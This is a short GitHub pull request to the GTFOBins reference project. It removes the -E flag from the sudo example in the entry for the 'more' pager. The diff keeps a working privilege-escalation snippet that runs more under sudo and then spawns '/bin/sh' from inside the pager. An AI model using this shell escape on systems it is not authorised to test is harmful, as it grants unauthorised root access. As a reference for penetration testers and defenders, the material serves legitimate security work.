### PR TITLE
Remove -E option of sudo

### DIFF
--- a/_gtfobins/more.md
+++ b/_gtfobins/more.md
@@ -10,6 +10,6 @@ functions:
     - code: ./more file_to_read
   sudo:
     - code: |
-        TERM= sudo -E more /etc/profile
+        TERM= sudo more /etc/profile
         !/bin/sh
 ---


### PR DESCRIPTION
Using -E option means that all the environment variables for the user deploy should be preserved.

Please see attached image.

![bgVQkRm](https://user-images.githubusercontent.com/9420289/84234947-14a62980-aac3-11ea-9a37-6403156fc238.png)
